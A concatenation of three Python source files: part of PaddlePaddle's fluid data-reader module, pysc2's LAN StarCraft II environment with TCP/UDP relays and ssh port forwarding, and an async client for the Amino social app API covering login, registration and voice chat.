import paddle.dataset.mnist as mnist
def network(reader):
img, label = fluid.layers.read_file(reader)
# User defined network. Here a simple regression as example
predict = fluid.layers.fc(input=img, size=10, act='softmax')
loss = fluid.layers.cross_entropy(input=predict, label=label)
return fluid.layers.mean(loss)
# Create train_main_prog and train_startup_prog
train_main_prog = fluid.Program()
train_startup_prog = fluid.Program()
with fluid.program_guard(train_main_prog, train_startup_prog):
# Use fluid.unique_name.guard() to share parameters with test program
with fluid.unique_name.guard():
train_reader = fluid.layers.py_reader(capacity=64,
shapes=[(-1, 1, 28, 28),
(-1, 1)],
dtypes=['float32', 'int64'],
name='train_reader')
train_reader.decorate_paddle_reader(
paddle.reader.shuffle(paddle.batch(mnist.train(), batch_size=5),
buf_size=500))
train_loss = network(train_reader) # some network definition
adam = fluid.optimizer.Adam(learning_rate=0.01)
adam.minimize(train_loss)
# Create test_main_prog and test_startup_prog
test_main_prog = fluid.Program()
test_startup_prog = fluid.Program()
with fluid.program_guard(test_main_prog, test_startup_prog):
# Use fluid.unique_name.guard() to share parameters with train program
with fluid.unique_name.guard():
test_reader = fluid.layers.py_reader(capacity=32,
shapes=[(-1, 1, 28, 28), (-1, 1)],
dtypes=['float32', 'int64'],
name='test_reader')
test_reader.decorate_paddle_reader(paddle.batch(mnist.test(), 512))
test_loss = network(test_reader)
fluid.Executor(fluid.CUDAPlace(0)).run(train_startup_prog)
fluid.Executor(fluid.CUDAPlace(0)).run(test_startup_prog)
train_exe = fluid.ParallelExecutor(use_cuda=True,
loss_name=train_loss.name,
main_program=train_main_prog)
test_exe = fluid.ParallelExecutor(use_cuda=True,
loss_name=test_loss.name,
main_program=test_main_prog)
for epoch_id in range(10):
train_reader.start()
try:
while True:
train_exe.run(fetch_list=[train_loss.name])
except fluid.core.EOFException:
train_reader.reset()
test_reader.start()
try:
while True:
test_exe.run(fetch_list=[test_loss.name])
except fluid.core.EOFException:
test_reader.reset()
"""
return _py_reader(
capacity=capacity,
shapes=shapes,
dtypes=dtypes,
lod_levels=lod_levels,
name=name,
use_double_buffer=use_double_buffer)
def create_py_reader_by_data(capacity,
feed_list,
name=None,
use_double_buffer=True):
"""
Create a Python reader for data feeding in Python
This layer returns a Reader Variable.
    Works much like py_reader except that its input is feed_list
    instead of shapes, dtypes and lod_levels.
Args:
capacity(int): The buffer capacity maintained by :code:`py_reader`.
feed_list(list(Variable)): The data feed list.
        name(basestring): The prefix of the Python queue name and Reader name.
            If None, a name will be generated automatically.
        use_double_buffer(bool): Whether to use double buffer or not.
Returns:
Variable: A Reader from which we can get feeding data.
Examples:
.. code-block:: python
import paddle
import paddle.fluid as fluid
import paddle.dataset.mnist as mnist
def network(img, label):
# User defined network. Here a simple regression as example
predict = fluid.layers.fc(input=img, size=10, act='softmax')
loss = fluid.layers.cross_entropy(input=predict, label=label)
return fluid.layers.mean(loss)
image = fluid.layers.data(name='image', shape=[1, 28, 28], dtype='float32')
label = fluid.layers.data(name='label', shape=[1], dtype='int64')
reader = fluid.layers.create_py_reader_by_data(capacity=64,
feed_list=[image, label])
reader.decorate_paddle_reader(
paddle.reader.shuffle(paddle.batch(mnist.train(), batch_size=5),
buf_size=500))
img, label = fluid.layers.read_file(reader)
loss = network(img, label) # some network definition
fluid.Executor(fluid.CUDAPlace(0)).run(fluid.default_startup_program())
exe = fluid.ParallelExecutor(use_cuda=True, loss_name=loss.name)
for epoch_id in range(10):
reader.start()
try:
while True:
exe.run(fetch_list=[loss.name])
except fluid.core.EOFException:
reader.reset()
"""
return _py_reader(
capacity=capacity,
shapes=None,
dtypes=None,
lod_levels=None,
name=name,
use_double_buffer=use_double_buffer,
feed_list=feed_list)
def open_files(filenames,
shapes,
lod_levels,
dtypes,
thread_num=None,
buffer_size=None,
pass_num=1,
is_test=None):
"""
Open files
This layer takes a list of files to read from and returns a Reader Variable.
    Via the Reader Variable, we can get data from the given files. All files must
    have name suffixes to indicate their formats, e.g., '*.recordio'.
Args:
filenames(list): The list of file names.
        shapes(list): List of tuples declaring the data shapes.
        lod_levels(list): List of ints declaring the lod_level of each data item.
        dtypes(list): List of strings declaring the data types.
        thread_num(int|None): The number of threads used to read the files.
            Default: min(len(filenames), cpu_count).
        buffer_size(int|None): The buffer size of the reader. Default: 3 * thread_num.
        pass_num(int): Number of passes to run.
        is_test(bool|None): Whether `open_files` is used for testing. If it is
            used for testing, the order of the generated data matches the file
            order. Otherwise, the data order is not guaranteed to be the same
            between epochs. Default: False.
Returns:
Variable: A Reader Variable via which we can get file data.
Examples:
.. code-block:: python
            import paddle.fluid as fluid
reader = fluid.layers.io.open_files(filenames=['./data1.recordio',
'./data2.recordio'],
shapes=[(3,224,224), (1,)],
lod_levels=[0, 0],
dtypes=['float32', 'int64'])
# Via the reader, we can use 'read_file' layer to get data:
image, label = fluid.layers.io.read_file(reader)
"""
if thread_num is None:
thread_num = min(len(filenames), multiprocessing.cpu_count())
else:
thread_num = int(thread_num)
if buffer_size is None:
buffer_size = 3 * thread_num
else:
buffer_size = int(buffer_size)
if isinstance(filenames, six.string_types):
filenames = [filenames]
dtypes = [convert_np_dtype_to_dtype_(dt) for dt in dtypes]
shape_concat = []
ranks = []
for shape in shapes:
shape_concat.extend(shape)
ranks.append(len(shape))
multi_file_reader_name = unique_name('multi_file_reader')
startup_blk = default_startup_program().current_block()
startup_reader = startup_blk.create_var(name=multi_file_reader_name)
attrs = {
'shape_concat': shape_concat,
'lod_levels': lod_levels,
'ranks': ranks,
'file_names': filenames,
'thread_num': thread_num,
'buffer_size': buffer_size
}
if is_test is not None:
attrs['is_test'] = is_test
startup_blk.append_op(
type='open_files', outputs={'Out': [startup_reader]}, attrs=attrs)
startup_reader.desc.set_dtypes(dtypes)
startup_reader.persistable = True
main_prog_reader = _copy_reader_var_(default_main_program().current_block(),
startup_reader)
if pass_num > 1:
main_prog_reader = multi_pass(
reader=main_prog_reader, pass_num=pass_num)
return monkey_patch_reader_methods(main_prog_reader)
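# The two helpers below wrap an existing reader Variable with a decorating reader
# op. __create_shared_decorated_reader__ creates the decorated reader in the
# startup program and copies it into the main program, so its state is shared
# across program runs; __create_unshared_decorated_reader__ creates it in the
# main program only.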
def __create_shared_decorated_reader__(op_type, reader, attrs):
var_name = unique_name(op_type)
startup_blk = default_startup_program().current_block()
startup_var = startup_blk.create_var(name=var_name)
startop_op = startup_blk.append_op(
type=op_type,
inputs={'UnderlyingReader': reader},
outputs={'Out': [startup_var]},
attrs=attrs)
startup_var.persistable = True
main_prog_block = default_main_program().current_block()
main_prog_var = _copy_reader_var_(main_prog_block, startup_var)
_copy_reader_create_op_(main_prog_block, startop_op)
return monkey_patch_reader_methods(main_prog_var)
def __create_unshared_decorated_reader__(op_type, reader, attrs, name=None):
new_reader_name = name if name is not None else unique_name(op_type)
main_blk = default_main_program().current_block()
new_reader = main_blk.create_var(name=new_reader_name)
main_blk.append_op(
type=op_type,
inputs={'UnderlyingReader': reader},
outputs={'Out': [new_reader]},
attrs=attrs)
return monkey_patch_reader_methods(new_reader)
def shuffle(reader, buffer_size):
"""
Creates a data reader whose data output is shuffled.
    Output from the iterator created by the original reader will be
    buffered into a shuffle buffer and then shuffled. The size of the shuffle
    buffer is determined by the argument buffer_size.
    Args:
        reader(Variable): the original reader whose output will be shuffled.
        buffer_size(int): the shuffle buffer size.
    Returns:
        Variable: the new reader whose output is shuffled.
Examples:
.. code-block:: python
import paddle.fluid as fluid
raw_reader = fluid.layers.io.open_files(filenames=['./data1.recordio',
'./data2.recordio'],
shapes=[(3,224,224), (1,)],
lod_levels=[0, 0],
dtypes=['float32', 'int64'],
thread_num=2,
buffer_size=2)
batch_reader = fluid.layers.batch(reader=raw_reader, batch_size=5)
shuffle_reader = fluid.layers.shuffle(reader=batch_reader, buffer_size=5000)
"""
return __create_unshared_decorated_reader__(
'create_shuffle_reader', reader, {'buffer_size': int(buffer_size)})
def batch(reader, batch_size):
"""
    This layer is a reader decorator. It takes a reader and adds
    'batching' decoration to it. When reading with the resulting
    decorated reader, output data will be automatically organized
    into batches.
Args:
reader(Variable): The reader to be decorated with 'batching'.
batch_size(int): The batch size.
Returns:
Variable: The reader which has been decorated with 'batching'.
Examples:
.. code-block:: python
import paddle.fluid as fluid
raw_reader = fluid.layers.io.open_files(filenames=['./data1.recordio',
'./data2.recordio'],
shapes=[(3,224,224), (1,)],
lod_levels=[0, 0],
dtypes=['float32', 'int64'],
thread_num=2,
buffer_size=2)
batch_reader = fluid.layers.batch(reader=raw_reader, batch_size=5)
# If we read data with the raw_reader:
# data = fluid.layers.read_file(raw_reader)
# We can only get data instance by instance.
#
# However, if we read data with the batch_reader:
# data = fluid.layers.read_file(batch_reader)
# Each 5 adjacent instances will be automatically combined together
# to become a batch. So what we get('data') is a batch data instead
# of an instance.
"""
return __create_unshared_decorated_reader__(
'create_batch_reader', reader, {'batch_size': int(batch_size)})
def double_buffer(reader, place=None, name=None):
"""
    Wrap a double buffer reader. The data will be copied to the target place
    through a double buffer queue. If the target place is None, the place the
    executor runs on will be used.
    Args:
        reader(Variable): the reader variable to be wrapped.
        place(Place): the place of the target data. Defaults to the place the
            executor runs on.
        name(str): Variable name. None if the user does not care.
Returns:
wrapped reader with double buffer.
Examples:
>>> import paddle.fluid as fluid
>>> reader = fluid.layers.open_files(filenames=['mnist.recordio'],
>>> shapes=[[-1, 784], [-1, 1]],
>>> dtypes=['float32', 'int64'])
>>> reader = fluid.layers.double_buffer(reader)
>>> img, label = fluid.layers.read_file(reader)
"""
attrs = dict()
if place is not None:
attrs['place'] = str(place).upper()
return __create_unshared_decorated_reader__(
'create_double_buffer_reader', reader, attrs, name=name)
def multi_pass(reader, pass_num):
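    # Decorates `reader` so that the underlying data source can be iterated for
    # `pass_num` passes before signalling end-of-file.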
return __create_shared_decorated_reader__(
'create_multi_pass_reader', reader, {'pass_num': int(pass_num)})
def read_file(reader):
"""
Execute the given reader and get data via it.
A reader is also a Variable. It can be a raw reader generated by
`fluid.layers.open_files()` or a decorated one generated by
`fluid.layers.double_buffer()` and so on.
Args:
reader(Variable): The reader to execute.
Returns:
Tuple[Variable]: Data read via the given reader.
Examples:
.. code-block:: python
import paddle.fluid as fluid
data_file = fluid.layers.open_files(
filenames=['mnist.recordio'],
            shapes=[(-1, 784), (-1, 1)],
lod_levels=[0, 0],
dtypes=["float32", "int64"])
data_file = fluid.layers.double_buffer(
fluid.layers.batch(data_file, batch_size=64))
input, label = fluid.layers.read_file(data_file)
"""
helper = LayerHelper('read_file')
out = [
helper.create_variable_for_type_inference(
stop_gradient=True, dtype='float32')
for _ in range(len(reader.desc.shapes()))
]
helper.append_op(
type='read', inputs={'Reader': [reader]}, outputs={'Out': out})
if len(out) == 1:
return out[0]
else:
return out
class Preprocessor(object):
"""
A block for data pre-processing in reader.
Args:
reader (Variable): A reader variable.
name (str, default None): The name of the reader.
Examples:
.. code-block:: python
reader = fluid.layers.io.open_files(
filenames=['./data1.recordio', './data2.recordio'],
shapes=[(3, 224, 224), (1, )],
lod_levels=[0, 0],
dtypes=['float32', 'int64'])
preprocessor = fluid.layers.io.Preprocessor(reader=reader)
with preprocessor.block():
img, lbl = preprocessor.inputs()
img_out = img / 2
lbl_out = lbl + 1
preprocessor.outputs(img_out, lbl_out)
data_file = fluid.layers.io.double_buffer(preprocessor())
"""
BEFORE_SUB_BLOCK = 0
IN_SUB_BLOCK = 1
AFTER_SUB_BLOCK = 2
def __init__(self, reader, name=None):
self.underlying_reader = reader
new_reader_name = name if name is not None else unique_name(
"create_custom_reader")
self.main_prog = default_main_program()
self.reader = self.main_prog.current_block().create_var(
name=new_reader_name)
self.sub_block = None
self.source_var_names = None
self.sink_var_names = None
self.status = Preprocessor.BEFORE_SUB_BLOCK
def _is_completed(self):
return self.sub_block and self.source_var_names and self.sink_var_names
@signature_safe_contextmanager
def block(self):
self.status = Preprocessor.IN_SUB_BLOCK
self.sub_block = self.main_prog._create_block()
yield
self.main_prog._rollback()
self.status = Preprocessor.AFTER_SUB_BLOCK
if not self._is_completed():
raise RuntimeError(
"The definition of preprocessor is incompleted! "
"Please make sure that you have set input and output "
"variables by invoking 'inputs' and 'outputs' in "
"Preprocessor's sub-block.")
def inputs(self):
if self.status != Preprocessor.IN_SUB_BLOCK:
raise RuntimeError(
"Preprocessor.inputs() can only be invoked inside the sub-block."
)
source_shapes = self.underlying_reader.desc.shapes()
source_dtypes = self.underlying_reader.desc.dtypes()
source_lod_levels = self.underlying_reader.desc.lod_levels()
self.source_var_names = [
unique_name("preprocessor_source")
for _ in six.moves.range(len(source_shapes))
]
source_vars = []
for var_name, shape, dtype, lod_level in zip(
self.source_var_names, source_shapes, source_dtypes,
source_lod_levels):
source_vars.append(self.main_prog.current_block().create_var(
name=var_name, shape=shape, dtype=dtype, lod_level=lod_level))
return source_vars
def outputs(self, *outs):
if self.status != Preprocessor.IN_SUB_BLOCK:
raise RuntimeError(
"Preprocessor.outputs() can only be invoked inside the sub-block."
)
self.sink_var_names = [var.name for var in outs]
def __call__(self, *args, **kwargs):
if self.status != Preprocessor.AFTER_SUB_BLOCK:
raise RuntimeError(
"Preprocessor output can only be retrieved after rnn block.")
self.main_prog.current_block().append_op(
type="create_custom_reader",
inputs={'UnderlyingReader': self.underlying_reader},
outputs={'Out': [self.reader]},
attrs={
"sub_block": self.sub_block,
"source_var_names": self.source_var_names,
"sink_var_names": self.sink_var_names
})
return monkey_patch_reader_methods(self.reader)
@templatedoc()
def load(out, file_path, load_as_fp16=None):
"""
${comment}
>>> import paddle.fluid as fluid
>>> tmp_tensor = fluid.layers.create_tensor(dtype='float32')
>>> fluid.layers.load(tmp_tensor, "./tmp_tensor.bin")
Args:
out(${out_type}): ${out_comment}.
file_path(${file_path_type}): ${file_path_comment}.
load_as_fp16(${load_as_fp16_type}): ${load_as_fp16_comment}.
Returns:
None
"""
helper = LayerHelper("load", **locals())
attrs = {"file_path": file_path}
if load_as_fp16 is not None:
attrs['load_as_fp16'] = load_as_fp16
helper.append_op(type="load", inputs={}, output={"Out": out}, args=attrs)
|
lan_sc2_env.py
|
# Copyright 2017 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""A Starcraft II environment for playing LAN games vs humans.
Check pysc2/bin/play_vs_agent.py for documentation.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import binascii
import collections
import hashlib
import json
from absl import logging
import os
import socket
import struct
import subprocess
import threading
from pysc2 import run_configs
from pysc2.env import sc2_env
from pysc2.lib import run_parallel
import whichcraft
from s2clientprotocol import sc2api_pb2 as sc_pb
class Addr(collections.namedtuple("Addr", ["ip", "port"])):
def __str__(self):
ip = "[%s]" % self.ip if ":" in self.ip else self.ip
return "%s:%s" % (ip, self.port)
def daemon_thread(target, args):
t = threading.Thread(target=target, args=args)
t.daemon = True
t.start()
return t
def udp_server(addr):
family = socket.AF_INET6 if ":" in addr.ip else socket.AF_INET
sock = socket.socket(family, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
sock.bind(addr)
return sock
def tcp_server(tcp_addr, settings):
"""Start up the tcp server, send the settings."""
family = socket.AF_INET6 if ":" in tcp_addr.ip else socket.AF_INET
sock = socket.socket(family, socket.SOCK_STREAM, socket.IPPROTO_TCP)
sock.bind(tcp_addr)
sock.listen(1)
logging.info("Waiting for connection on %s", tcp_addr)
conn, addr = sock.accept()
logging.info("Accepted connection from %s", Addr(*addr))
# Send map_data independently for py2/3 and json encoding reasons.
write_tcp(conn, settings["map_data"])
send_settings = {k: v for k, v in settings.items() if k != "map_data"}
logging.debug("settings: %s", send_settings)
write_tcp(conn, json.dumps(send_settings).encode())
return conn
def tcp_client(tcp_addr):
"""Connect to the tcp server, and return the settings."""
family = socket.AF_INET6 if ":" in tcp_addr.ip else socket.AF_INET
sock = socket.socket(family, socket.SOCK_STREAM, socket.IPPROTO_TCP)
logging.info("Connecting to: %s", tcp_addr)
sock.connect(tcp_addr)
logging.info("Connected.")
map_data = read_tcp(sock)
settings_str = read_tcp(sock)
if not settings_str:
raise socket.error("Failed to read")
settings = json.loads(settings_str.decode())
logging.info("Got settings. map_name: %s.", settings["map_name"])
logging.debug("settings: %s", settings)
settings["map_data"] = map_data
return sock, settings
def log_msg(prefix, msg):
logging.debug("%s: len: %s, hash: %s, msg: 0x%s", prefix, len(msg),
hashlib.md5(msg).hexdigest()[:6], binascii.hexlify(msg[:25]))
def udp_to_tcp(udp_sock, tcp_conn):
while True:
msg, _ = udp_sock.recvfrom(2**16)
log_msg("read_udp", msg)
if not msg:
return
write_tcp(tcp_conn, msg)
def tcp_to_udp(tcp_conn, udp_sock, udp_to_addr):
while True:
msg = read_tcp(tcp_conn)
if not msg:
return
log_msg("write_udp", msg)
udp_sock.sendto(msg, udp_to_addr)
def read_tcp(conn):
read_size = read_tcp_size(conn, 4)
if not read_size:
return
size = struct.unpack("@I", read_size)[0]
msg = read_tcp_size(conn, size)
log_msg("read_tcp", msg)
return msg
def read_tcp_size(conn, size):
"""Read `size` number of bytes from `conn`, retrying as needed."""
chunks = []
bytes_read = 0
while bytes_read < size:
chunk = conn.recv(size - bytes_read)
if not chunk:
if bytes_read > 0:
logging.warning("Incomplete read: %s of %s.", bytes_read, size)
return
chunks.append(chunk)
bytes_read += len(chunk)
return b"".join(chunks)
def write_tcp(conn, msg):
log_msg("write_tcp", msg)
conn.sendall(struct.pack("@I", len(msg)))
conn.sendall(msg)
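# A minimal sketch of the framing implemented by write_tcp/read_tcp above: every
# message is a 4-byte native-endian unsigned length prefix followed by the raw
# payload, e.g. (hypothetical values):
#   write_tcp(conn, b"hello")   # sends struct.pack("@I", 5) + b"hello"
#   msg = read_tcp(conn)        # returns b"hello" once all bytes have arrived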
def forward_ports(remote_host, local_host, local_listen_ports,
remote_listen_ports):
"""Forwards ports such that multiplayer works between machines.
Args:
remote_host: Where to ssh to.
local_host: "127.0.0.1" or "::1".
local_listen_ports: Which ports to listen on locally to forward remotely.
remote_listen_ports: Which ports to listen on remotely to forward locally.
Returns:
The ssh process.
Raises:
ValueError: if it can't find ssh.
"""
if ":" in local_host and not local_host.startswith("["):
local_host = "[%s]" % local_host
ssh = whichcraft.which("ssh") or whichcraft.which("plink")
if not ssh:
raise ValueError("Couldn't find an ssh client.")
args = [ssh, remote_host]
for local_port in local_listen_ports:
args += ["-L", "%s:%s:%s:%s" % (local_host, local_port,
local_host, local_port)]
for remote_port in remote_listen_ports:
args += ["-R", "%s:%s:%s:%s" % (local_host, remote_port,
local_host, remote_port)]
logging.info("SSH port forwarding: %s", " ".join(args))
return subprocess.Popen(args, stdout=subprocess.PIPE, stderr=subprocess.PIPE,
stdin=subprocess.PIPE, close_fds=(os.name == "posix"))
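# A usage sketch for forward_ports above (hypothetical host and ports): forward
# the local game ports over ssh, then terminate the tunnel when the game ends.
#   tunnel = forward_ports("user@remote-host", "127.0.0.1",
#                          local_listen_ports=[14380], remote_listen_ports=[14381])
#   ...
#   tunnel.terminate()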
class RestartException(Exception):
pass
class LanSC2Env(sc2_env.SC2Env):
"""A Starcraft II environment for playing vs humans over LAN.
This owns a single instance, and expects to join a game hosted by some other
script, likely play_vs_agent.py.
"""
def __init__(self, # pylint: disable=invalid-name
_only_use_kwargs=None,
host="127.0.0.1",
config_port=None,
race=None,
agent_interface_format=None,
discount=1.,
visualize=False,
step_mul=None,
replay_dir=None):
"""Create a SC2 Env that connects to a remote instance of the game.
This assumes that the game is already up and running, and it only needs to
join. You need some other script to launch the process and call
RequestCreateGame. It also assumes that it's a multiplayer game, and that
the ports are consecutive.
You must pass a resolution that you want to play at. You can send either
feature layer resolution or rgb resolution or both. If you send both you
must also choose which to use as your action space. Regardless of which you
choose you must send both the screen and minimap resolutions.
For each of the 4 resolutions, either specify size or both width and
height. If you specify size then both width and height will take that value.
Args:
_only_use_kwargs: Don't pass args, only kwargs.
host: Which ip to use. Either ipv4 or ipv6 localhost.
config_port: Where to find the config port.
race: Race for this agent.
agent_interface_format: AgentInterfaceFormat object describing the
format of communication between the agent and the environment.
discount: Returned as part of the observation.
visualize: Whether to pop up a window showing the camera and feature
layers. This won't work without access to a window manager.
step_mul: How many game steps per agent step (action/observation). None
means use the map default.
replay_dir: Directory to save a replay.
Raises:
ValueError: if the race is invalid.
ValueError: if the resolutions aren't specified correctly.
ValueError: if the host or port are invalid.
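    Example:
      A minimal sketch, assuming a host script is already waiting on
      config_port 14380:
        env = LanSC2Env(
            host="127.0.0.1",
            config_port=14380,
            race=sc2_env.Race.terran,
            agent_interface_format=sc2_env.AgentInterfaceFormat(
                feature_dimensions=sc2_env.Dimensions(screen=84, minimap=64)))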
"""
if _only_use_kwargs:
raise ValueError("All arguments must be passed as keyword arguments.")
if host not in ("127.0.0.1", "::1"):
raise ValueError("Bad host arguments. Must be a localhost")
if not config_port:
raise ValueError("Must pass a config_port.")
if agent_interface_format is None:
raise ValueError("Please specify agent_interface_format.")
if not race:
race = sc2_env.Race.random
self._num_agents = 1
self._discount = discount
self._step_mul = step_mul or 8
self._save_replay_episodes = 1 if replay_dir else 0
self._replay_dir = replay_dir
self._score_index = -1 # Win/loss only.
self._score_multiplier = 1
self._episode_length = 0 # No limit.
self._run_config = run_configs.get()
self._parallel = run_parallel.RunParallel() # Needed for multiplayer.
interface = self._get_interface(
agent_interface_format=agent_interface_format, require_raw=visualize)
self._launch_remote(host, config_port, race, interface)
self._finalize([agent_interface_format], [interface], visualize)
def _launch_remote(self, host, config_port, race, interface):
"""Make sure this stays synced with bin/play_vs_agent.py."""
self._tcp_conn, settings = tcp_client(Addr(host, config_port))
self._map_name = settings["map_name"]
if settings["remote"]:
self._udp_sock = udp_server(
Addr(host, settings["ports"]["server"]["game"]))
daemon_thread(tcp_to_udp,
(self._tcp_conn, self._udp_sock,
Addr(host, settings["ports"]["client"]["game"])))
daemon_thread(udp_to_tcp, (self._udp_sock, self._tcp_conn))
extra_ports = [
settings["ports"]["server"]["game"],
settings["ports"]["server"]["base"],
settings["ports"]["client"]["game"],
settings["ports"]["client"]["base"],
]
self._sc2_procs = [self._run_config.start(
extra_ports=extra_ports, host=host, version=settings["game_version"],
window_loc=(700, 50))]
self._controllers = [p.controller for p in self._sc2_procs]
# Create the join request.
join = sc_pb.RequestJoinGame(options=interface)
join.race = race
join.shared_port = 0 # unused
join.server_ports.game_port = settings["ports"]["server"]["game"]
join.server_ports.base_port = settings["ports"]["server"]["base"]
join.client_ports.add(game_port=settings["ports"]["client"]["game"],
base_port=settings["ports"]["client"]["base"])
self._controllers[0].save_map(settings["map_path"], settings["map_data"])
self._controllers[0].join_game(join)
def _restart(self):
# Can't restart since it's not clear how you'd coordinate that with the
# other players.
raise RestartException("Can't restart")
def close(self):
if hasattr(self, "_tcp_conn") and self._tcp_conn:
self._tcp_conn.close()
self._tcp_conn = None
if hasattr(self, "_udp_sock") and self._udp_sock:
self._udp_sock.close()
self._udp_sock = None
super(LanSC2Env, self).close()
|
client.py
|
import json
import base64
import aiohttp
import asyncio
import threading
from uuid import uuid4
from time import timezone, sleep
from typing import BinaryIO, Union
from time import time as timestamp
from locale import getdefaultlocale as locale
from .lib.util import exceptions, headers, device, objects, helpers
from .socket import Callbacks, SocketHandler
device = device.DeviceGenerator()
class Client(Callbacks, SocketHandler):
def __init__(self, deviceId: str = None, socketDebugging = False):
self.api = "https://service.narvii.com/api/v1"
self.authenticated = False
self.configured = False
self.user_agent = device.user_agent
if deviceId is not None: self.device_id = deviceId
else: self.device_id = device.device_id
SocketHandler.__init__(self, self, debug=socketDebugging)
Callbacks.__init__(self, self)
self.json = None
self.sid = None
self.userId = None
self.account: objects.UserProfile = objects.UserProfile(None)
self.profile: objects.UserProfile = objects.UserProfile(None)
self.session = aiohttp.ClientSession()
def __del__(self):
try:
loop = asyncio.get_event_loop()
loop.create_task(self._close_session())
except RuntimeError:
loop = asyncio.new_event_loop()
loop.run_until_complete(self._close_session())
async def _close_session(self):
if not self.session.closed: await self.session.close()
def parse_headers(self, data = None):
        if data:
            return headers.Headers(data=data, deviceId=self.device_id).headers
        else:
            return headers.Headers(deviceId=self.device_id).headers
async def join_voice_chat(self, comId: str, chatId: str, joinType: int = 1):
"""
Joins a Voice Chat
**Parameters**
- **comId** : ID of the Community
- **chatId** : ID of the Chat
"""
# Made by Light, Ley and Phoenix
data = {
"o": {
"ndcId": int(comId),
"threadId": chatId,
"joinRole": joinType,
"id": "2154531" # Need to change?
},
"t": 112
}
data = json.dumps(data)
await self.send(data)
async def join_video_chat(self, comId: str, chatId: str, joinType: int = 1):
"""
Joins a Video Chat
**Parameters**
- **comId** : ID of the Community
- **chatId** : ID of the Chat
"""
# Made by Light, Ley and Phoenix
data = {
"o": {
"ndcId": int(comId),
"threadId": chatId,
"joinRole": joinType,
"channelType": 5,
"id": "2154531" # Need to change?
},
"t": 108
}
data = json.dumps(data)
await self.send(data)
async def join_video_chat_as_viewer(self, comId: str, chatId: str):
data = {
"o":
{
"ndcId": int(comId),
"threadId": chatId,
"joinRole": 2,
"id": "72446"
},
"t": 112
}
data = json.dumps(data)
await self.send(data)
async def run_vc(self, comId: str, chatId: str, joinType: str):
while self.active:
data = {
"o": {
"ndcId": comId,
"threadId": chatId,
"joinRole": joinType,
"id": "2154531" # Need to change?
},
"t": 112
}
data = json.dumps(data)
await self.send(data)
            await asyncio.sleep(1)
async def start_vc(self, comId: str, chatId: str, joinType: int = 1):
data = {
"o": {
"ndcId": comId,
"threadId": chatId,
"joinRole": joinType,
"id": "2154531" # Need to change?
},
"t": 112
}
data = json.dumps(data)
await self.send(data)
data = {
"o": {
"ndcId": comId,
"threadId": chatId,
"channelType": 1,
"id": "2154531" # Need to change?
},
"t": 108
}
data = json.dumps(data)
await self.send(data)
self.active = True
        # run_vc is a coroutine, so schedule it on the running event loop instead
        # of handing it to a (never started) Thread.
        asyncio.create_task(self.run_vc(comId, chatId, joinType))
async def end_vc(self, comId: str, chatId: str, joinType: int = 2):
self.active = False
data = {
"o": {
"ndcId": comId,
"threadId": chatId,
"joinRole": joinType,
"id": "2154531" # Need to change?
},
"t": 112
}
data = json.dumps(data)
await self.send(data)
async def login_sid(self, SID: str):
"""
        Log in to an account with an SID
**Parameters**
- **SID** : SID of the account
"""
uId = helpers.sid_to_uid(SID)
self.authenticated = True
self.sid = SID
self.userId = uId
self.account: objects.UserProfile = await self.get_user_info(uId)
self.profile: objects.UserProfile = await self.get_user_info(uId)
headers.sid = self.sid
await self.startup()
async def login(self, email: str, password: str):
"""
        Log in to an account.
**Parameters**
- **email** : Email of the account.
- **password** : Password of the account.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
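        **Example**
            A minimal usage sketch (hypothetical credentials)::
                client = Client()
                await client.login(email="user@example.com", password="hunter2")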
"""
data = json.dumps({
"email": email,
"v": 2,
"secret": f"0 {password}",
"deviceID": self.device_id,
"clientType": 100,
"action": "normal",
"timestamp": int(timestamp() * 1000)
})
async with self.session.post(f"{self.api}/g/s/auth/login", headers=self.parse_headers(data=data), data=data) as response:
if response.status != 200: return exceptions.CheckException(json.loads(await response.text()))
else:
self.authenticated = True
self.json = json.loads(await response.text())
self.sid = self.json["sid"]
self.userId = self.json["account"]["uid"]
self.account: objects.UserProfile = objects.UserProfile(self.json["account"]).UserProfile
self.profile: objects.UserProfile = objects.UserProfile(self.json["userProfile"]).UserProfile
headers.sid = self.sid
await self.startup()
return response.status
async def register(self, nickname: str, email: str, password: str, verificationCode: str, deviceId: str = device.device_id):
"""
Register an account.
**Parameters**
- **nickname** : Nickname of the account.
- **email** : Email of the account.
- **password** : Password of the account.
- **verificationCode** : Verification code.
- **deviceId** : The device id being registered to.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
data = json.dumps({
"secret": f"0 {password}",
"deviceID": deviceId,
"email": email,
"clientType": 100,
"nickname": nickname,
"latitude": 0,
"longitude": 0,
"address": None,
"clientCallbackURL": "narviiapp://relogin",
"validationContext": {
"data": {
"code": verificationCode
},
"type": 1,
"identity": email
},
"type": 1,
"identity": email,
"timestamp": int(timestamp() * 1000)
})
async with self.session.post(f"{self.api}/g/s/auth/register", headers=self.parse_headers(data=data), data=data) as response:
if response.status != 200: return exceptions.CheckException(json.loads(await response.text()))
else: return response.status
async def restore(self, email: str, password: str):
"""
Restore a deleted account.
**Parameters**
- **email** : Email of the account.
- **password** : Password of the account.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
data = json.dumps({
"secret": f"0 {password}",
"deviceID": device.device_id,
"email": email,
"timestamp": int(timestamp() * 1000)
})
async with self.session.post(f"{self.api}/g/s/account/delete-request/cancel", headers=self.parse_headers(data=data), data=data) as response:
if response.status != 200: return exceptions.CheckException(json.loads(await response.text()))
else: return response.status
async def logout(self):
"""
Logout from an account.
**Parameters**
- No parameters required.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
data = json.dumps({
"deviceID": self.device_id,
"clientType": 100,
"timestamp": int(timestamp() * 1000)
})
async with self.session.post(f"{self.api}/g/s/auth/logout", headers=self.parse_headers(data=data), data=data) as response:
if response.status != 200: return exceptions.CheckException(json.loads(await response.text()))
else:
self.authenticated = False
self.json = None
self.sid = None
self.userId = None
                self.account = None
                self.profile = None
headers.sid = None
await self.close()
await self.session.close()
